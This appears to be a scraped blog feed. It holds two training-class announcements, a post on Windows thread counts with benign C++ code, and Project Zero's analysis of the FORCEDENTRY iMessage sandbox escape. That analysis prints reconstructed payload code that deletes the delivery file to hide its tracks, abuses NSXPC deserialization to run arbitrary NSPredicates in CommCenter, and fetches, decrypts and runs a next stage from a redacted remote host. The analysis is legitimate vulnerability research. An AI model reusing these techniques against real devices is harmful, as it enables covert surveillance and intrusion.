Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

Next COM Programming Class

5 February 2022 at 10:42

Update: the class is cancelled. I guess there weren’t that many people interested in COM this time around.

Today I’m opening registration for the COM Programming class to be held in April. The syllabus for the 3 day class can be found here. The course will be delivered in 6 half-days (4 hours each).

Dates: April (25, 26, 27, 28), May (2, 3).
Times: 2pm to 6pm, London time
Cost: 700 USD (if paid by an individual), 1300 USD (if paid by a company).

The class will be conducted remotely using Microsoft Teams or a similar platform.

What you need to know before the class: You should be comfortable using Windows on a Power User level. Concepts such as processes, threads, DLLs, and virtual memory should be understood fairly well. You should have experience writing code in C and some C++. You don’t have to be an expert, but you must know C and basic C++ to get the most out of this class. In case you have doubts, talk to me.

Participants in my Windows Internals and Windows System Programming classes have the required knowledge for the class.

We’ll start by looking at why COM was created in the first place, and then build clients and servers, digging into various mechanisms COM provides. See the syllabus for more details.

Previous students in my classes get 10% off. Multiple participants from the same company get a discount (email me for the details).

To register, send an email to [email protected] with the title “COM Training”, and write the name(s), email(s) and time zone(s) of the participants.

COMReuse

zodiacon

Registration is open for the Windows Internals training

16 March 2022 at 13:13

My schedule has been a mess in recent months, and continues to be so for the next few months. However, I am opening registration today for the Windows Internals training with some date changes from my initial plan.

Here are the dates and times (all based on London time) – 5 days total:

  • July 6: 4pm to 12am (full day)
  • July 7: 4pm to 8pm
  • July 11: 4pm to 12am (full day)
  • July 12, 13, 14, 18, 19: 4pm to 8pm

Training cost is 800 USD, if paid by an individual, or 1500 USD if paid by a company. Participants from Ukraine (please provide some proof) are welcome with a 90% discount (paying 80 USD, individual payments only).

If you’d like to register, please send me an email to [email protected] with “Windows Internals training” in the title, provide your full name, company (if any), preferred contact email, and your time zone. The basic syllabus can be found here. if you’ve sent me an email before when I posted about my upcoming classes, you don’t have to do that again – I will send full details soon.

The sessions will be recorded, so can watch any part you may be missing, or that may be somewhat overwhelming in “real time”.

As usual, if you have any questions, feel free to send me an email, or DM me on twitter (@zodiacon) or Linkedin (https://www.linkedin.com/in/pavely/).

Kernel2

zodiacon

Threads, Threads, and More Threads

21 March 2022 at 11:00

Looking at a typical Windows system shows thousands of threads, with process numbers in the hundreds, even though the total CPU consumption is low, meaning most of these threads are doing nothing most of the time. I typically rant about it in my Windows Internals classes. Why so many threads?

Here is a snapshot of my Task Manager showing the total number of threads and processes:

Showing processes details and sorting by thread count looks something like this:

The System process clearly has many threads. These are kernel threads created by the kernel itself and by device drivers. These threads are always running in kernel mode. For this post, I’ll disregard the System process and focus on “normal” user-mode processes.

There are other kernel processes that we should ignore, such as Registry and Memory Compression. Registry has few threads, but Memory Compression has many. It’s not shown in Task Manager (by design), but is shown in other tools, such as Process Explorer. While I’m writing this post, it has 78 threads. We should probably skip that process as well as being “out of our control”.

Notice the large number of threads in processes running the images Explorer.exe, SearchIndexer.exe, Nvidia Web helper.exe, Outlook.exe, Powerpnt.exe and MsMpEng.exe. Let’s write some code to calculate the average number of threads in a process and the standard deviation:

float ComputeStdDev(std::vector<int> const& values, float& average) {
	float total = 0;
	std::for_each(values.begin(), values.end(), 
		[&](int n) { total += n; });
	average = total / values.size();
	total = 0;
	std::for_each(values.begin(), values.end(), 
		[&](int n) { total += (n - average) * (n - average); });
	return std::sqrt(total / values.size());
}

int main() {
	auto hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	
	PROCESSENTRY32 pe;
	pe.dwSize = sizeof(pe);

	// skip the idle process
	::Process32First(hSnapshot, &pe);

	int processes = 0, threads = 0;
	std::vector<int> threads_per_process;
	threads_per_process.reserve(500);
	while (::Process32Next(hSnapshot, &pe)) {
		processes++;
		threads += pe.cntThreads;
		threads_per_process.push_back(pe.cntThreads);
	}
	::CloseHandle(hSnapshot);

	assert(processes == threads_per_process.size());

	printf("Process: %d Threads: %d\n", processes, threads);
	float average;
	auto sd = ComputeStdDev(threads_per_process, average);
	printf("Average threads/process: %.2f\n", average);
	printf("Std. Dev.: %.2f\n", sd);

	return 0;
}

The ComputeStdDev function computes the standard deviation and average of a vector of integers. The main function uses the ToolHelp API to enumerate processes in the system, which fortunately also provides the number of threads in each processes (stored in the threads_per_process vector. If I run this (no processes removed just yet), this is what I get:

Process: 525 Threads: 7810
Average threads/process: 14.88
Std. Dev.: 23.38

Almost 15 threads per process, with little CPU consumption in my Task Manager. The standard deviation is more telling – it’s big compared to the average, which suggests that many processes are far from the average in their thread consumption. And since a negative thread count is not possible (even zero is almost impossible), the the divergence is with higher thread numbers.

To be fair, let’s remove the System and Memory Compression processes from our calculations. Here are the changes to the while loop:

while (::Process32Next(hSnapshot, &pe)) {
	if (pe.th32ProcessID == 4 || _wcsicmp(pe.szExeFile, L"memory compression") == 0)
		continue;
//...

Here are the results:

Process: 521 Threads: 7412
Average threads/process: 14.23
Std. Dev.: 14.14

The standard deviation is definitely smaller, but still pretty big (close to the average), which does not invalidate the previous point. Some processes use lots of threads.

In an ideal world, the number of threads in a system would be the same as the number of logical processors – any more and threads might fight over processors, any less and you’re not using the full power of the machine. Obviously, each “normal” process must have at least one thread running whatever main function is available in the executable, so on my system 521 threads would be the minimum number of threads. Still – we have over 7000.

What are these threads doing, anyway? Let’s examine some processes. First, an Explorer.exe process. Here is the Threads tab shown in Process Explorer:

Thread list in Explorer.exe instance

93 threads. I’ve sorted the list by Start Address to get a sense of the common functions used. Let’s dig into some of them. One of the most common (in other processes as well) is ntdll!TppWorkerThread – this is a thread pool thread, likely waiting for work. Clicking the Stack button (or double clicking the entry in the list) shows the following call stack:

ntoskrnl.exe!KiSwapContext+0x76
ntoskrnl.exe!KiSwapThread+0x500
ntoskrnl.exe!KiCommitThreadWait+0x14f
ntoskrnl.exe!KeWaitForSingleObject+0x233
ntoskrnl.exe!KiSchedulerApc+0x3bd
ntoskrnl.exe!KiDeliverApc+0x2e9
ntoskrnl.exe!KiSwapThread+0x827
ntoskrnl.exe!KiCommitThreadWait+0x14f
ntoskrnl.exe!KeRemoveQueueEx+0x263
ntoskrnl.exe!IoRemoveIoCompletion+0x98
ntoskrnl.exe!NtWaitForWorkViaWorkerFactory+0x38e
ntoskrnl.exe!KiSystemServiceCopyEnd+0x25
ntdll.dll!ZwWaitForWorkViaWorkerFactory+0x14
ntdll.dll!TppWorkerThread+0x2f7
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

The system call NtWaitForWorkViaWorkerFactory is the one waiting for work (the name Worker Factory is the internal name of the thread pool type in the kernel, officially called TpWorkerFactory). The number of such threads is typically dynamic, growing and shrinking based on the amount of work provided to the thread pool(s). The minimum and maximum threads can be tweaked by APIs, but most processes are unlikely to do so.

Another function that appears a lot in the list is shcore.dll!_WrapperThreadProc. It looks like some generic function used by Explorer for its own threads. We can examine some call stacks to get a sense of what’s going on. Here is one:

ntoskrnl.exe!KiSwapContext+0x76
ntoskrnl.exe!KiSwapThread+0x500
ntoskrnl.exe!KiCommitThreadWait+0x14f
ntoskrnl.exe!KeWaitForSingleObject+0x233
ntoskrnl.exe!KiSchedulerApc+0x3bd
ntoskrnl.exe!KiDeliverApc+0x2e9
ntoskrnl.exe!KiSwapThread+0x827
ntoskrnl.exe!KiCommitThreadWait+0x14f
ntoskrnl.exe!KeWaitForSingleObject+0x233
ntoskrnl.exe!KeWaitForMultipleObjects+0x45b
win32kfull.sys!xxxRealSleepThread+0x362
win32kfull.sys!xxxSleepThread2+0xb5
win32kfull.sys!xxxRealInternalGetMessage+0xcfd
win32kfull.sys!NtUserGetMessage+0x92
win32k.sys!NtUserGetMessage+0x16
ntoskrnl.exe!KiSystemServiceCopyEnd+0x25
win32u.dll!NtUserGetMessage+0x14
USER32.dll!GetMessageW+0x2e
SHELL32.dll!_LocalServerThread+0x66
shcore.dll!_WrapperThreadProc+0xe9
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

This one seems to be waiting for UI messages, probably managing some user interface (GetMessage). We can verify with other tools. Here is my own WinSpy:

Apparently, I was wrong. This thread has the hidden window type used to receive messages targeting COM objects that leave in this Single Threaded Apartment (STA).

We can inspect WinSpy some more to see the threads and windows created by Explorer. I’ll leave that to the interested reader.

Other generic call stacks start with ucrtbase.dll!thread_start+0x42. Many of them have the following call stack (kernel part trimmed for brevity):

ntdll.dll!ZwWaitForMultipleObjects+0x14
KERNELBASE.dll!WaitForMultipleObjectsEx+0xf0
KERNELBASE.dll!WaitForMultipleObjects+0xe
cdp.dll!shared::CallbackNotifierListener::ListenerInternal::StartInternal+0x9f
cdp.dll!std::thread::_Invoke<std::tuple<<lambda_10793e1829a048bb2f8cc95974633b56> >,0>+0x2f
ucrtbase.dll!thread_start<unsigned int (__cdecl*)(void *),1>+0x42
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

A function in CDP.dll is waiting for something (WaitForMultipleObjects). I count at least 12 threads doing just that. Perhaps all these waits could be consolidated to a smaller number of threads?

Let’s tackle a different process. Here is an instance of Teams.exe. My teams is minimized to the tray and I have not interacted with it for a while:

Teams threads

62 threads. Many have the same CRT wrapper for a thread created by Teams. Here are several call stacks I observed:

ntdll.dll!ZwRemoveIoCompletion+0x14
KERNELBASE.dll!GetQueuedCompletionStatus+0x4f
skypert.dll!rtnet::internal::SingleThreadIOCP::iocpLoop+0x116
skypert.dll!SplOpaqueUpperLayerThread::run+0x84
skypert.dll!auf::priv::MRMWTransport::process1+0x6c
skypert.dll!auf::ThreadPoolExecutorImp::workLoop+0x160
skypert.dll!auf::tpImpThreadTrampoline+0x47
skypert.dll!spl::threadWinDispatch+0x19
skypert.dll!spl::threadWinEntry+0x17b
ucrtbase.dll!thread_start<unsigned int (__cdecl*)(void *),1>+0x42
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21
ntdll.dll!ZwWaitForAlertByThreadId+0x14
ntdll.dll!RtlSleepConditionVariableCS+0x105
KERNELBASE.dll!SleepConditionVariableCS+0x29
Teams.exe!uv_cond_wait+0x10
Teams.exe!worker+0x8d
Teams.exe!uv__thread_start+0xa2
Teams.exe!thread_start<unsigned int (__cdecl*)(void *),1>+0x50
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

You can check more threads, but you get the idea. Most threads are waiting for something – this is not the ideal activity for a thread. A thread should run (useful) code.

Last example, Word:

57 threads. Word has been minimized for more than an hour now. The clearly common call stack looks like this:

ntdll.dll!ZwWaitForAlertByThreadId+0x14
ntdll.dll!RtlSleepConditionVariableSRW+0x131
KERNELBASE.dll!SleepConditionVariableSRW+0x29
v8jsi.dll!CrashForExceptionInNonABICompliantCodeRange+0x4092f6
v8jsi.dll!CrashForExceptionInNonABICompliantCodeRange+0x11ff2
v8jsi.dll!v8_inspector::V8StackTrace::topScriptIdAsInteger+0x43ad0
ucrtbase.dll!thread_start<unsigned int (__cdecl*)(void *),1>+0x42
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

v8jsi.dll is the React Native v8 engine – it’s creating many threads, most of which are doing nothing. I found it in Outlook and PowerPoint as well.

Many applications today depend on various libraries and frameworks, some of which don’t seem to care too much about using threads economically – examples include Node.js, the Electron framework, even Java and .NET. Threads are not free – there is the ETHREAD and related data structures in the kernel, stack in kernel space, and stack in user space. Context switches and code run by the kernel scheduler when threads change states from Running to Waiting, and from Waiting to Ready are not free, either.

Many desktop/laptop systems today are very powerful and it might seem everything is fine. I don’t think so. Developers use so many layers of abstraction these days, that we sometimes forget there are actual processors that execute the code, and need to use memory and other resources. None of that is free.

image-1

zodiacon

FORCEDENTRY: Sandbox Escape

By: Anonymous
31 March 2022 at 16:00

Posted by Ian Beer & Samuel Groß of Google Project Zero

We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. Any editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.

Late last year we published a writeup of the initial remote code execution stage of FORCEDENTRY, the zero-click iMessage exploit attributed by Citizen Lab to NSO. By sending a .gif iMessage attachment (which was really a PDF) NSO were able to remotely trigger a heap buffer overflow in the ImageIO JBIG2 decoder. They used that vulnerability to bootstrap a powerful weird machine capable of loading the next stage in the infection process: the sandbox escape.

In this post we'll take a look at that sandbox escape. It's notable for using only logic bugs. In fact it's unclear where the features that it uses end and the vulnerabilities which it abuses begin. Both current and upcoming state-of-the-art mitigations such as Pointer Authentication and Memory Tagging have no impact at all on this sandbox escape.

An observation

During our initial analysis of the .gif file Samuel noticed that rendering the image appeared to leak memory. Running the heap tool after releasing all the associated resources gave the following output:

$ heap $pid

------------------------------------------------------------

All zones: 4631 nodes (826336 bytes)        

             

   COUNT    BYTES     AVG   CLASS_NAME   TYPE   BINARY          

   =====    =====     ===   ==========   ====   ======        

    1969   469120   238.3   non-object

     825    26400    32.0   JBIG2Bitmap  C++   CoreGraphics

heap was able to determine that the leaked memory contained JBIG2Bitmap objects.

Using the -address option we could find all the individual leaked bitmap objects:

$ heap -address JBIG2Bitmap $pid

and dump them out to files. One of those objects was quite unlike the others:

$ hexdump -C dumpXX.bin | head

00000000  62 70 6c 69 73 74 30 30  |bplist00|

...

00000018        24 76 65 72 73 69  |  $versi|

00000020  6f 6e 59 24 61 72 63 68  |onY$arch|

00000028  69 76 65 72 58 24 6f 62  |iverX$ob|

00000030  6a 65 63 74 73 54 24 74  |jectsT$t|

00000038  6f 70                    |op      |

00000040        4e 53 4b 65 79 65  |  NSKeye|

00000048  64 41 72 63 68 69 76 65  |dArchive|

It's clearly a serialized NSKeyedArchiver. Definitely not what you'd expect to see in a JBIG2Bitmap object. Running strings we see plenty of interesting things (noting that the URL below is redacted):

Objective-C class and selector names:

NSFunctionExpression

NSConstantValueExpression

NSConstantValue

expressionValueWithObject:context:

filteredArrayUsingPredicate:

_web_removeFileOnlyAtPath:

context:evaluateMobileSubscriberIdentity:

performSelectorOnMainThread:withObject:waitUntilDone:

...

The name of the file which delivered the exploit:

XXX.gif

Filesystems paths:

/tmp/com.apple.messages

/System/Library/PrivateFrameworks/SlideshowKit.framework/Frameworks/OpusFoundation.framework

a URL:

https://XXX.cloudfront.net/YYY/ZZZ/megalodon?AAA

Using plutil we can convert the bplist00 binary format to XML. Performing some post-processing and cleanup we can see that the top-level object in the NSKeyedArchiver is a serialized NSFunctionExpression object.

NSExpression NSPredicate NSExpression

If you've ever used Core Data or tried to filter a Objective-C collection you might have come across NSPredicates. According to Apple's public documentation they are used "to define logical conditions for constraining a search for a fetch or for in-memory filtering".

For example, in Objective-C you could filter an NSArray object like this:

  NSArray* names = @[@"one", @"two", @"three"];

  NSPredicate* pred;

  pred = [NSPredicate predicateWithFormat:

            @"SELF beginswith[c] 't'"];

  NSLog(@"%@", [names filteredArrayUsingPredicate:pred]);

The predicate is "SELF beginswith[c] 't'". This prints an NSArray containing only "two" and "three".

[NSPredicate predicateWithFormat] builds a predicate object by parsing a small query language, a little like an SQL query.

NSPredicates can be built up from NSExpressions, connected by NSComparisonPredicates (like less-than, greater-than and so on.)

NSExpressions themselves can be fairly complex, containing aggregate expressions (like "IN" and "CONTAINS"), subqueries, set expressions, and, most interestingly, function expressions.

Prior to 2007 (in OS X 10.4 and below) function expressions were limited to just the following five extra built-in methods: sum, count, min, max, and average.

But starting in OS X 10.5 (which would also be around the launch of iOS in 2007) NSFunctionExpressions were extended to allow arbitrary method invocations with the FUNCTION keyword:

  "FUNCTION('abc', 'stringByAppendingString', 'def')" => @"abcdef"

FUNCTION takes a target object, a selector and an optional list of arguments then invokes the selector on the object, passing the arguments. In this case it will allocate an NSString object @"abc" then invoke the stringByAppendingString: selector passing the NSString @"def", which will evaluate to the NSString @"abcdef".

In addition to the FUNCTION keyword there's CAST which allows full reflection-based access to all Objective-C types (as opposed to just being able to invoke selectors on literal strings and integers):

  "FUNCTION(CAST('NSFileManager', 'Class'), 'defaultManager')"

Here we can get access to the NSFileManager class and call the defaultManager selector to get a reference to a process's shared file manager instance.

These keywords exist in the string representation of NSPredicates and NSExpressions. Parsing those strings involves creating a graph of NSExpression objects, NSPredicate objects and their subclasses like NSFunctionExpression. It's a serialized version of such a graph which is present in the JBIG2 bitmap.

NSPredicates using the FUNCTION keyword are effectively Objective-C scripts. With some tricks it's possible to build nested function calls which can do almost anything you could do in procedural Objective-C. Figuring out some of those tricks was the key to the 2019 Real World CTF DezhouInstrumenz challenge, which would evaluate an attacker supplied NSExpression format string. The writeup by the challenge author is a great introduction to these ideas and I'd strongly recommend reading that now if you haven't. The rest of this post builds on the tricks described in that post.

A tale of two parts

The only job of the JBIG2 logic gate machine described in the previous blog post is to cause the deserialization and evaluation of an embedded NSFunctionExpression. No attempt is made to get native code execution, ROP, JOP or any similar technique.

Prior to iOS 14.5 the isa field of an Objective-C object was not protected by Pointer Authentication Codes (PAC), so the JBIG2 machine builds a fake Objective-C object with a fake isa such that the invocation of the dealloc selector causes the deserialization and evaluation of the NSFunctionExpression. This is very similar to the technique used by Samuel in the 2020 SLOP post.

This NSFunctionExpression has two purposes:

Firstly, it allocates and leaks an ASMKeepAlive object then tries to cover its tracks by finding and deleting the .gif file which delivered the exploit.

Secondly, it builds a payload NSPredicate object then triggers a logic bug to get that NSPredicate object evaluated in the CommCenter process, reachable from the IMTranscoderAgent sandbox via the com.apple.commcenter.xpc NSXPC service.

Let's look at those two parts separately:

Covering tracks

The outer level NSFunctionExpression calls performSelectorOnMainThread:withObject:waitUntilDone which in turn calls makeObjectsPerformSelector:@"expressionValueWithObject:context:" on an NSArray of four NSFunctionExpressions. This allows the four independent NSFunctionExpressions to be evaluated sequentially.

With some manual cleanup we can recover pseudo-Objective-C versions of the serialized NSFunctionExpressions.

The first one does this:

[[AMSKeepAlive alloc] initWithName:"KA"]

This allocates and then leaks an AppleMediaServices KeepAlive object. The exact purpose of this is unclear.

The second entry does this:

[[NSFileManager defaultManager] _web_removeFileOnlyAtPath:

  [@"/tmp/com.apple.messages" stringByAppendingPathComponent:

    [ [ [ [

            [NSFileManager defaultManager]

            enumeratorAtPath: @"/tmp/com.apple.messages"

          ]

          allObjects

        ]

        filteredArrayUsingPredicate:

          [

            [NSPredicate predicateWithFormat:

              [

                [@"SELF ENDSWITH '"

                  stringByAppendingString: "XXX.gif"]

                stringByAppendingString: "'"

      ]   ] ] ]

      firstObject

    ]

  ]

]

Reading these single expression NSFunctionExpressions is a little tricky; breaking that down into a more procedural form it's equivalent to this:

NSFileManager* fm = [NSFileManager defaultManager];

NSDirectoryEnumerator* dir_enum;

dir_enum = [fm enumeratorAtPath: @"/tmp/com.apple.messages"]

NSArray* allTmpFiles = [dir_enum allObjects];

NSString* filter;

filter = ["@"SELF ENDSWITH '" stringByAppendingString: "XXX.gif"];

filter = [filter stringByAppendingString: "'"];

NSPredicate* pred;

pred = [NSPredicate predicateWithFormat: filter]

NSArray* matches;

matches = [allTmpFiles filteredArrayUsingPredicate: pred];

NSString* gif_subpath = [matches firstObject];

NSString* root = @"/tmp/com.apple.messages";

NSString* full_path;

full_path = [root stringByAppendingPathComponent: gifSubpath];

[fm _web_removeFileOnlyAtPath: full_path];

This finds the XXX.gif file used to deliver the exploit which iMessage has stored somewhere under the /tmp/com.apple.messages folder and deletes it.

The other two NSFunctionExpressions build a payload and then trigger its evaluation in CommCenter. For that we need to look at NSXPC.

NSXPC

NSXPC is a semi-transparent remote-procedure-call mechanism for Objective-C. It allows the instantiation of proxy objects in one process which transparently forward method calls to the "real" object in another process:

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html

I say NSXPC is only semi-transparent because it does enforce some restrictions on what objects are allowed to traverse process boundaries. Any object "exported" via NSXPC must also define a protocol which designates which methods can be invoked and the allowable types for each argument. The NSXPC programming guide further explains the extra handling required for methods which require collections and other edge cases.

The low-level serialization used by NSXPC is the same explored by Natalie Silvanovich in her 2019 blog post looking at the fully-remote attack surface of the iPhone. An important observation in that post was that subclasses of classes with any level of inheritance are also allowed, as is always the case with NSKeyedUnarchiver deserialization.

This means that any protocol object which declares a particular type for a field will also, by design, accept any subclass of that type.

The logical extreme of this would be that a protocol which declared an argument type of NSObject would allow any subclass, which is the vast majority of all Objective-C classes.

Grep to the rescue

This is fairly easy to analyze automatically. Protocols are defined statically so we can just find them and check each one. Tools like RuntimeBrowser and classdump can parse the static protocol definitions and output human-readable source code. Grepping the output of RuntimeBrowser like this is sufficient to find dozens of cases of NSObject pointers in Objective-C protocols:

  $ egrep -Rn "\(NSObject \*\)arg" *

Not all the results are necessarily exposed via NSXPC, but some clearly are, including the following two matches in CoreTelephony.framework:

Frameworks/CoreTelephony.framework/\

CTXPCServiceSubscriberInterface-Protocol.h:39:

-(void)evaluateMobileSubscriberIdentity:

        (CTXPCServiceSubscriptionContext *)arg1

       identity:(NSObject *)arg2

       completion:(void (^)(NSError *))arg3;

Frameworks/CoreTelephony.framework/\

CTXPCServiceCarrierBundleInterface-Protocol.h:13:

-(void)setWiFiCallingSettingPreferences:

         (CTXPCServiceSubscriptionContext *)arg1

       key:(NSString *)arg2

       value:(NSObject *)arg3

       completion:(void (^)(NSError *))arg4;

evaluateMobileSubscriberIdentity string appears in the list of selector-like strings we first saw when running strings on the bplist00. Indeed, looking at the parsed and beautified NSFunctionExpression we see it doing this:

[ [ [CoreTelephonyClient alloc] init]

  context:X

  evaluateMobileSubscriberIdentity:Y]

This is a wrapper around the lower-level NSXPC code and the argument passed as Y above to the CoreTelephonyClient method corresponds to the identity:(NSObject *)arg2 argument passed via NSXPC to CommCenter (which is the process that hosts com.apple.commcenter.xpc, the NSXPC service underlying the CoreTelephonyClient). Since the parameter is explicitly named as NSObject* we can in fact pass any subclass of NSObject*, including an NSPredicate! Game over?

Parsing vs Evaluation

It's not quite that easy. The DezhouInstrumentz writeup discusses this attack surface and notes that there's an extra, specific mitigation. When an NSPredicate is deserialized by its initWithCoder: implementation it sets a flag which disables evaluation of the predicate until the allowEvaluation method is called.

So whilst you certainly can pass an NSPredicate* as the identity argument across NSXPC and get it deserialized in CommCenter, the implementation of evaluateMobileSubscriberIdentity: in CommCenter is definitely not going to call allowEvaluation:  to make the predicate safe for evaluation then evaluateWithObject: and then evaluate it.

Old techniques, new tricks

From the exploit we can see that they in fact pass an NSArray with two elements:

[0] = AVSpeechSynthesisVoice

[1] = PTSection {rows = NSArray { [0] = PTRow() }

The first element is an AVSpeechSynthesisVoice object and the second is a PTSection containing a single PTRow. Why?

PTSection and PTRow are both defined in the PrototypeTools private framework. PrototypeTools isn't loaded in the CommCenter target process. Let's look at what happens when an AVSpeechSynthesisVoice is deserialized:

Finding a voice

AVSpeechSynthesisVoice is implemented in AVFAudio.framework, which is loaded in CommCenter:

$ sudo vmmap `pgrep CommCenter` | grep AVFAudio

__TEXT  7ffa22c4c000-7ffa22d44000 r-x/r-x SM=COW \

/System/Library/Frameworks/AVFAudio.framework/Versions/A/AVFAudio

Assuming that this was the first time that an AVSpeechSynthesisVoice object was created inside CommCenter (which is quite likely) the Objective-C runtime will call the initialize method on the AVSpeechSynthesisVoice class before instantiating the first instance.

[AVSpeechSynthesisVoice initialize] has a dispatch_once block with the following code:

NSBundle* bundle;

bundle = [NSBundle bundleWithPath:

                     @"/System/Library/AccessibilityBundles/\

                         AXSpeechImplementation.bundle"];

if (![bundle isLoaded]) {

    NSError err;

    [bundle loadAndReturnError:&err]

}

So sending a serialized AVSpeechSynthesisVoice object will cause CommCenter to load the /System/Library/AccessibilityBundles/AXSpeechImplementation.bundle library. With some scripting using otool -L to list dependencies we can  find the following dependency chain from AXSpeechImplementation.bundle to PrototypeTools.framework:

['/System/Library/AccessibilityBundles/\

    AXSpeechImplementation.bundle/AXSpeechImplementation',

 '/System/Library/AccessibilityBundles/\

    AXSpeechImplementation.bundle/AXSpeechImplementation',

 '/System/Library/PrivateFrameworks/\

    AccessibilityUtilities.framework/AccessibilityUtilities',

 '/System/Library/PrivateFrameworks/\

    AccessibilitySharedSupport.framework/AccessibilitySharedSupport',

'/System/Library/PrivateFrameworks/Sharing.framework/Sharing',

'/System/Library/PrivateFrameworks/\

    PrototypeTools.framework/PrototypeTools']

This explains how the deserialization of a PTSection will succeed. But what's so special about PTSections and PTRows?

Predicated Sections

[PTRow initwithcoder:] contains the following snippet:

  self->condition = [coder decodeObjectOfClass:NSPredicate

                           forKey:@"condition"]

  [self->condition allowEvaluation]

This will deserialize an NSPredicate object, assign it to the PTRow member variable condition and call allowEvaluation. This is meant to indicate that the deserializing code considers this predicate safe, but there's no attempt to perform any validation on the predicate contents here. They then need one more trick to find a path to which will additionally evaluate the PTRow's condition predicate.

Here's a snippet from [PTSection initWithCoder:]:

NSSet* allowed = [NSSet setWithObjects: @[PTRow]]

id* rows = [coder decodeObjectOfClasses:allowed forKey:@"rows"]

[self initWithRows:rows]

This deserializes an array of PTRows and passes them to [PTSection initWithRows] which assigns a copy of the array of PTRows to PTSection->rows then calls [self _reloadEnabledRows] which in turn passes each row to [self _shouldEnableRow:]

_shouldEnableRow:row {

  if (row->condition) {

    return [row->condition evaluateWithObject: self->settings]

  }

}

And thus, by sending a PTSection containing a single PTRow with an attached condition NSPredicate they can cause the evaluation of an arbitrary NSPredicate, effectively equivalent to arbitrary code execution in the context of CommCenter.

Payload 2

The NSPredicate attached to the PTRow uses a similar trick to the first payload to cause the evaluation of six independent NSFunctionExpressions, but this time in the context of the CommCenter process. They're presented here in pseudo Objective-C:

Expression 1

[  [CaliCalendarAnonymizer sharedAnonymizedStrings]

   setObject:

     @[[NSURLComponents

         componentsWithString:

         @"https://cloudfront.net/XXX/XXX/XXX?aaaa"], '0']

   forKey: @"0"

]

The use of [CaliCalendarAnonymizer sharedAnonymizedStrings] is a trick to enable the array of independent NSFunctionExpressions to have "local variables". In this first case they create an NSURLComponents object which is used to build parameterised URLs. This URL builder is then stored in the global dictionary returned by [CaliCalendarAnonymizer sharedAnonymizedStrings] under the key "0".

Expression 2

[[NSBundle

  bundleWithPath:@"/System/Library/PrivateFrameworks/\

     SlideshowKit.framework/Frameworks/OpusFoundation.framework"

 ] load]

This causes the OpusFoundation library to be loaded. The exact reason for this is unclear, though the dependency graph of OpusFoundation does include AuthKit which is used by the next NSFunctionExpression. It's possible that this payload is generic and might also be expected to work when evaluated in processes where AuthKit isn't loaded.

Expression 3

[ [ [CaliCalendarAnonymizer sharedAnonymizedStrings]

    objectForKey:@"0" ]

  setQueryItems:

    [ [ [NSArray arrayWithObject:

                 [NSURLQueryItem

                    queryItemWithName: @"m"

                    value:[AKDevice _hardwareModel] ]

                                 ] arrayByAddingObject:

                 [NSURLQueryItem

                    queryItemWithName: @"v"

                    value:[AKDevice _buildNumber] ]

                                 ] arrayByAddingObject:

                 [NSURLQueryItem

                    queryItemWithName: @"u"

                    value:[NSString randomString]]

]

This grabs a reference to the NSURLComponents object stored under the "0" key in the global sharedAnonymizedStrings dictionary then parameterizes the HTTP query string with three values:

  [AKDevice _hardwareModel] returns a string like "iPhone12,3" which determines the exact device model.

  [AKDevice _buildNumber] returns a string like "18A8395" which in combination with the device model allows determining the exact firmware image running on the device.

  [NSString randomString] returns a decimal string representation of a 32-bit random integer like "394681493".

Expression 4

[ [CaliCalendarAnonymizer sharedAnonymizedString]

  setObject:

    [NSPropertyListSerialization

      propertyListWithData:

        [[[NSData

             dataWithContentsOfURL:

               [[[CaliCalendarAnonymizer sharedAnonymizedStrings]

                 objectForKey:@"0"] URL]

          ] AES128DecryptWithPassword:NSData(XXXX)

         ]  decompressedDataUsingAlgorithm:3 error:]

       options: Class(NSConstantValueExpression)

      format: Class(NSConstantValueExpression)

      errors:Class(NSConstantValueExpression)

  ]

  forKey:@"1"

]

The innermost reference to sharedAnonymizedStrings here grabs the NSURLComponents object and builds the full url from the query string parameters set last earlier. That url is passed to [NSData dataWithContentsOfURL:] to fetch a data blob from a remote server.

That data blob is decrypted with a hardcoded AES128 key, decompressed using zlib then parsed as a plist. That parsed plist is stored in the sharedAnonymizedStrings dictionary under the key "1".

Expression 5

[ [[NSThread mainThread] threadDictionary]

  addEntriesFromDictionary:

    [[CaliCalendarAnonymizer sharedAnonymizedStrings]

    objectForKey:@"1"]

]

This copies all the keys and values from the "next-stage" plist into the main thread's theadDictionary.

Expression 6

[ [NSExpression expressionWithFormat:

    [[[CaliCalendarAnonymizer sharedAnonymizedStrings]

      objectForKey:@"1"]

    objectForKey: @"a"]

  ]

  expressionValueWithObject:nil context:nil

]

Finally, this fetches the value of the "a" key from the next-stage plist, parses it as an NSExpression string and evaluates it.

End of the line

At this point we lose the ability to follow the exploit. The attackers have escaped the IMTranscoderAgent sandbox, requested a next-stage from the command and control server and executed it, all without any memory corruption or dependencies on particular versions of the operating system.

In response to this exploit iOS 15.1 significantly reduced the computational power available to NSExpressions:

NSExpression immediately forbids certain operations that have significant side effects, like creating and destroying objects. Additionally, casting string class names into Class objects with NSConstantValueExpression is deprecated.

In addition the PTSection and PTRow objects have been hardened with the following check added around the parsing of serialized NSPredicates:

if (os_variant_allows_internal_security_policies(

      "com.apple.PrototypeTools") {

  [coder decodeObjectOfClass:NSPredicate forKey:@"condition]

...

Object deserialization across trust boundaries still presents an enormous attack surface however.

Conclusion

Perhaps the most striking takeaway is the depth of the attack surface reachable from what would hopefully be a fairly constrained sandbox. With just two tricks (NSObject pointers in protocols and library loading gadgets) it's likely possible to attack almost every initWithCoder implementation in the dyld_shared_cache. There are presumably many other classes in addition to NSPredicate and NSExpression which provide the building blocks for logic-style exploits.

